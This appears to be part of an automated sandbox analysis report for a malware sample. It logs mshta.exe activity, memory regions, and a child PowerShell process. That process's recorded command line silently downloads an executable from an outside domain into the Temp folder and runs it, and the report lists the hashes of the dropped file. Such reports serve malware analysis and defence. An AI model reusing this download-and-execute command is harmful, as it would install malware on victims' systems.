Create	C:\Windows/system32/WindowsPowerShell/v1.0/powershell.exe	show_window = SW_HIDE		1	Fn

Module (123)

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\mshtml.dll	base_address = 0x63150000	1	Fn
Load	comctl32.dll	base_address = 0x74080000	1	Fn
Load	OLEAUT32.dll	base_address = 0x75580000	1	Fn
Load	mshtml.dll	base_address = 0x63150000	1	Fn
Load	OLEACC.DLL	base_address = 0x726e0000	1	Fn
Load	ieframe.dll	base_address = 0x6d270000	2	Fn
Load	ADVAPI32.dll	base_address = 0x754d0000	1	Fn
Load	ole32.dll	base_address = 0x766f0000	1	Fn
Load	shell32.dll	base_address = 0x75810000	1	Fn
Load	oleaut32.dll	base_address = 0x75580000	1	Fn
Load	WININET.dll	base_address = 0x76cf0000	1	Fn
Get Handle	c:\windows\system32\mshta.exe	base_address = 0x2b0000	2	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x76c10000	5	Fn
Get Handle	c:\windows\system32\kernelbase.dll	base_address = 0x75260000	26	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x754d0000	1	Fn
Get Handle	EXPLORER.EXE	base_address = 0x0	1	Fn
Get Handle	IEXPLORE.EXE	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x766f0000	2	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x75580000	1	Fn
Get Handle	mscoree.dll	base_address = 0x0	1	Fn
Get Filename	-	process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\system32\mShta.exe, size = 260	4	Fn
Get Filename	C:\Windows\System32\mshtml.dll	process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshtml.dll, size = 260	1	Fn
Get Filename	c:\windows\system32\mshta.exe	process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\system32\mShta.exe, size = 260	1	Fn
Get Filename	IEXPLORE.EXE	process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\system32\mShta.exe, size = 260	1	Fn
Get Filename	IEXPLORE.EXE	process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\system32\mShta.exe, size = 261	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FlsAlloc, address_out = 0x76c6418d	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FlsGetValue, address_out = 0x76c61e16	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FlsSetValue, address_out = 0x76c676e6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FlsFree, address_out = 0x76c61f61	1	Fn
Get Address	c:\windows\system32\kernelbase.dll	function = EncodePointer, address_out = 0x76faa295	9	Fn
Get Address	c:\windows\system32\kernelbase.dll	function = DecodePointer, address_out = 0x76facd10	17	Fn
Get Address	c:\windows\system32\kernelbase.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x7526726b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x76c64157	2	Fn
Get Address	c:\windows\system32\advapi32.dll	function = EventWrite, address_out = 0x76f7d59a	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = EventRegister, address_out = 0x76fb5b0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = EventUnregister, address_out = 0x76fad9dd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = RegisterApplicationRestart, address_out = 0x76c43665	1	Fn
Get Address	c:\windows\system32\mshtml.dll	function = RunHTMLApplication, address_out = 0x631ae710	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = InitializeSRWLock, address_out = 0x76fa9981	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = AcquireSRWLockExclusive, address_out = 0x76fa334e	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = AcquireSRWLockShared, address_out = 0x76fa338e	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ReleaseSRWLockExclusive, address_out = 0x76fa3324	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ReleaseSRWLockShared, address_out = 0x76fa33d7	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = 6, address_out = 0x75583e59	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = 7, address_out = 0x75584680	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = 8, address_out = 0x75583ed5	1	Fn
Get Address	c:\windows\system32\oleacc.dll	function = LresultFromObject, address_out = 0x726e2663	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegisterTraceGuidsA, address_out = 0x76f5fb7d	2	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegOpenKeyExA, address_out = 0x754e4907	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegQueryValueExA, address_out = 0x754e48ef	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegCloseKey, address_out = 0x754e469d	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoGetObjectContext, address_out = 0x7673632b	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstance, address_out = 0x76739d0b	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = 2, address_out = 0x75584642	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CLSIDFromProgIDEx, address_out = 0x76700782	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoGetClassObject, address_out = 0x767254ad	1	Fn
Get Address	c:\windows\system32\shell32.dll	function = ShellExecuteExW, address_out = 0x75831e46	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantClear, address_out = 0x75583eae	1	Fn
Get Address	c:\windows\system32\wininet.dll	function = InternetUnlockRequestFile, address_out = 0x76d37457	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = 201, address_out = 0x75584af8	1	Fn
Create Mapping	-	filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 16	1	Fn
Map	-	process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE	1	Fn

Window (9)

Operation	Window Name	Additional Information	Count	Logfile
Create	-	class_name = HTML Application Host Window Class, wndproc_parameter = 1667798656	1	Fn
Create	-	class_name = HTML Application Host Window Class, wndproc_parameter = 1667798656	1	Fn
Create	-	wndproc_parameter = 0	1	Fn
Create	-	wndproc_parameter = 1183792	1	Fn
Set Attribute	-	class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352	2	Fn
Set Attribute	-	index = 18446744073709551595, new_long = 1183792	1	Fn
Set Attribute	-	class_name = HTML Application Host Window Class, index = 18446744073709551596, new_long = 262144	1	Fn
Set Attribute	-	index = 18446744073709551595, new_long = 0	1	Fn

Keyboard (170)

Operation	Additional Information	Count	Logfile
Get Info	type = KB_LOCALE_ID	2	Fn
Read	virtual_key_code = VK_SHIFT, result_out = 0	28	Fn
Read	virtual_key_code = VK_CONTROL, result_out = 0	28	Fn
Read	virtual_key_code = VK_MENU, result_out = 0	28	Fn
Read	virtual_key_code = VK_LSHIFT, result_out = 0	21	Fn
Read	virtual_key_code = VK_LCONTROL, result_out = 0	21	Fn
Read	virtual_key_code = VK_LMENU, result_out = 0	21	Fn
Read	virtual_key_code = VK_LBUTTON, result_out = 0	7	Fn
Read	virtual_key_code = VK_RBUTTON, result_out = 0	7	Fn
Read	virtual_key_code = VK_MBUTTON, result_out = 0	7	Fn

System (60)

Operation	Additional Information	Count	Logfile
Get Cursor	x_out = 1248, y_out = 501	3	Fn
Get Cursor	x_out = 791, y_out = 282	19	Fn
Sleep	duration = 100 milliseconds (0.100 seconds)	5	Fn
Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
Get Time	type = System Time, time = 2017-12-20 14:26:49 (UTC)	1	Fn
Get Time	type = Ticks, time = 88015	1	Fn
Get Time	type = Ticks, time = 108295	1	Fn
Get Time	type = Ticks, time = 108311	9	Fn
Get Time	type = Ticks, time = 108358	2	Fn
Get Time	type = Ticks, time = 108639	1	Fn
Get Time	type = Ticks, time = 108654	1	Fn
Get Info	type = Operating System	7	Fn
Get Info	type = Operating System	5	Fn
Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn
Get Info	-	3	Fn

Mutex (1)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = Local\!PrivacIE!SharedMemory!Mutex		1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data
Get Environment String	name = JS_PROFILER		1	Fn

Ini (5)

Operation	Filename	Additional Information	Count	Logfile
Read	Win.ini	section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20	1	Fn
Read	Win.ini	section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11	1	Fn
Read	Win.ini	section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50	1	Fn
Read	Win.ini	section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200	1	Fn
Read	Win.ini	section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50	1	Fn

Process #5: powershell.exe

(Host: 753, Network: 74)

Information	Value
ID	#5
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\Users\BGC6U8~1\AppData\Local\Temp/lambdoidtegument.exe');C:\Users\BGC6U8~1\AppData\Local\Temp/lambdoidtegument.exe
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:47, Reason: Child Process
Unmonitor	End Time: 00:02:19, Reason: Terminated by Timeout
Monitor Duration	00:01:32

OS Process Information

Information	Value
PID	0xb44
Parent PID	0xa18 (c:\windows\system32\mshta.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f46e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B48 0x B60 0x B64 0x B68 0x B6C 0x B70 0x B74 0x B78 0x B7C 0x B80 0x B8C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
powershell.exe.mui	0x000e0000	0x000e2fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000150000	0x00150000	0x00217fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000220000	0x00220000	0x00220fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000230000	0x00230000	0x00230fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000240000	0x00240000	0x00241fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000250000	0x00250000	0x00250fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000260000	0x00260000	0x0029ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x00000000002a0000	0x002a0000	0x002a1fff	Pagefile Backed Memory	Readable	Region Actions
cversions.2.db	0x002b0000	0x002b3fff	Memory Mapped File	Readable	Region Actions
private_0x00000000002c0000	0x002c0000	0x003bffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000003c0000	0x003c0000	0x004c0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000004d0000	0x004d0000	0x005aefff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000005b0000	0x005b0000	0x005bffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000005c0000	0x005c0000	0x011bffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000011c0000	0x011c0000	0x011c0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
cversions.2.db	0x011d0000	0x011d3fff	Memory Mapped File	Readable	Region Actions
private_0x00000000011e0000	0x011e0000	0x0121ffff	Private Memory	Readable, Writable	Region Actions Download Dump
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x01220000	0x01244fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001250000	0x01250000	0x0128ffff	Private Memory	Readable, Writable	Region Actions Download Dump
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db	0x01290000	0x012bffff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000012c0000	0x012c0000	0x012c0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000012d0000	0x012d0000	0x012d0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000012e0000	0x012e0000	0x012e0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000012f0000	0x012f0000	0x012fffff	Private Memory	-	Region Actions Download Dump
private_0x0000000001300000	0x01300000	0x0130ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000001310000	0x01310000	0x0134ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001350000	0x01350000	0x0135ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000001360000	0x01360000	0x0136ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000001370000	0x01370000	0x0137ffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x01380000	0x0164efff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001650000	0x01650000	0x01a42fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001a50000	0x01a50000	0x01b4ffff	Private Memory	Readable, Writable	Region Actions Download Dump
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x01b50000	0x01bb5fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001bc0000	0x01bc0000	0x01bcffff	Private Memory	-	Region Actions Download Dump
private_0x0000000001bd0000	0x01bd0000	0x01bdffff	Private Memory	-	Region Actions Download Dump
private_0x0000000001be0000	0x01be0000	0x01c1ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001c20000	0x01c20000	0x01c2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
l_intl.nls	0x01c30000	0x01c32fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001c40000	0x01c40000	0x01c40fff	Private Memory	Readable, Writable	Region Actions Download Dump
sorttbls.nlp	0x01c50000	0x01c54fff	Memory Mapped File	Readable	Region Actions
microsoft.wsman.runtime.dll	0x01c60000	0x01c67fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000001c70000	0x01c70000	0x01c70fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001c80000	0x01c80000	0x01cbffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000001cc0000	0x01cc0000	0x01d5ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001d60000	0x01d60000	0x01d60fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001d60000	0x01d60000	0x01d6ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000001d70000	0x01d70000	0x01d7ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000001d80000	0x01d80000	0x01d8ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001d90000	0x01d90000	0x01d9ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000001da0000	0x01da0000	0x01ddffff	Private Memory	Readable, Writable	Region Actions Download Dump
kernelbase.dll.mui	0x01de0000	0x01e9ffff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x0000000001ea0000	0x01ea0000	0x01eb0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001ec0000	0x01ec0000	0x01ecffff	Private Memory	-	Region Actions Download Dump
private_0x0000000001ed0000	0x01ed0000	0x01edffff	Private Memory	-	Region Actions Download Dump
private_0x0000000001ee0000	0x01ee0000	0x01f1ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001f20000	0x01f20000	0x03f1ffff	Private Memory	Readable, Writable	Region Actions
sortkey.nlp	0x03f20000	0x03f60fff	Memory Mapped File	Readable	Region Actions
system.transactions.dll	0x03f70000	0x03fb2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000003fc0000	0x03fc0000	0x03ffffff	Private Memory	Readable, Writable	Region Actions Download Dump
system.management.automation.dll	0x04000000	0x042e1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorrc.dll	0x042f0000	0x04343fff	Memory Mapped File	Readable	Region Actions
private_0x0000000004350000	0x04350000	0x0435ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000004360000	0x04360000	0x0436ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000004370000	0x04370000	0x0437ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000004380000	0x04380000	0x0438ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000004390000	0x04390000	0x0440ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004410000	0x04410000	0x0441ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000004710000	0x04710000	0x0471ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000004730000	0x04730000	0x0473ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004740000	0x04740000	0x0474ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000004750000	0x04750000	0x0475ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000004760000	0x04760000	0x0476ffff	Private Memory	-	Region Actions Download Dump
private_0x0000000004770000	0x04770000	0x0482ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004790000	0x04790000	0x0479ffff	Private Memory	-	Region Actions Download Dump
private_0x00000000047f0000	0x047f0000	0x0482ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004840000	0x04840000	0x051cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000051d0000	0x051d0000	0x052cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000052e0000	0x052e0000	0x0531ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005350000	0x05350000	0x0538ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005390000	0x05390000	0x0546ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005390000	0x05390000	0x0542ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005430000	0x05430000	0x0546ffff	Private Memory	Readable, Writable	Region Actions Download Dump
powershell.exe	0x22020000	0x22091fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.directoryservices.ni.dll	0x5ff40000	0x60053fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.ni.dll	0x60060000	0x60163fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.xml.ni.dll	0x60170000	0x606a5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
culture.dll	0x60340000	0x60347fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.management.ni.dll	0x606b0000	0x60772fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.utility.ni.dll	0x60780000	0x6091dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.ni.dll	0x60920000	0x61199fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.dll	0x611a0000	0x61481fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.ni.dll	0x61490000	0x61c2bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorlib.ni.dll	0x61c30000	0x62727fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorwks.dll	0x63160000	0x6370afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.ni.dll	0x638e0000	0x6397bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.wsman.management.ni.dll	0x63980000	0x63a04fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x63c60000	0x63cd9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.dll	0x67aa0000	0x67ae2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.core.ni.dll	0x6cfa0000	0x6d1d4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.consolehost.ni.dll	0x6d1e0000	0x6d260fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr80.dll	0x6e8e0000	0x6e97afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x6e980000	0x6e9c9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
linkinfo.dll	0x6ee70000	0x6ee78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shdocvw.dll	0x6ee80000	0x6eeadfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.diagnostics.ni.dll	0x6f260000	0x6f2aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntshrui.dll	0x6fe10000	0x6fe7ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cscapi.dll	0x6fe80000	0x6fe8afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x71220000	0x7126bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shfolder.dll	0x71b70000	0x71b74fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.security.ni.dll	0x71f80000	0x71facfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.configuration.install.ni.dll	0x72270000	0x72294fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
slc.dll	0x73460000	0x73469fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x73490000	0x734a3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x737f0000	0x73810fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73f00000	0x73f3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x73f40000	0x74034fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x74080000	0x7421dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x745f0000	0x745f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x74750000	0x74766fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74910000	0x7494afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74b70000	0x74b85fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x74f40000	0x74f58fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74ff0000	0x74ffbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x750a0000	0x750aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
devobj.dll	0x75240000	0x75251fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75260000	0x752a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x75370000	0x75396fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75420000	0x754c0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x754d0000	0x7556ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x75580000	0x7560efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75810000	0x76459fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76460000	0x76469fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76470000	0x7648efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x765d0000	0x7661dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76620000	0x766e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x766f0000	0x7684bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76850000	0x768ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x768f0000	0x76908fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x76910000	0x76aacfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x76ab0000	0x76b32fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76b40000	0x76c0bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76c10000	0x76ce3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x76df0000	0x76e34fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76e40000	0x76eebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76f50000	0x7708bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x77110000	0x77114fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x77120000	0x77176fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77190000	0x77190fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ff50000	0x7ff50000	0x7ff5ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x000000007ff60000	0x7ff60000	0x7ffaffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd7000	0x7ffd7000	0x7ffd7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd8000	0x7ffd8000	0x7ffd8fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump
For performance reasons, the remaining 31 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\bgc6u8oy yxgxkr\appdata\local\temp\lambdoidtegument.exe	232.00 KB (237568 bytes)	MD5: 437efd63bf864669ef4312750c25c462 SHA1: 247f0b1576c24e50830f6ee326dce494c6ba478d SHA256: c5221c1250b9584be4be97a30dde5f1b82c3509749df7bf76a7d0c9d85514a5a		File Actions Show Properties Download

Host Behavior

File (335)

Operation	Filename	Additional Information	Count	Logfile
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
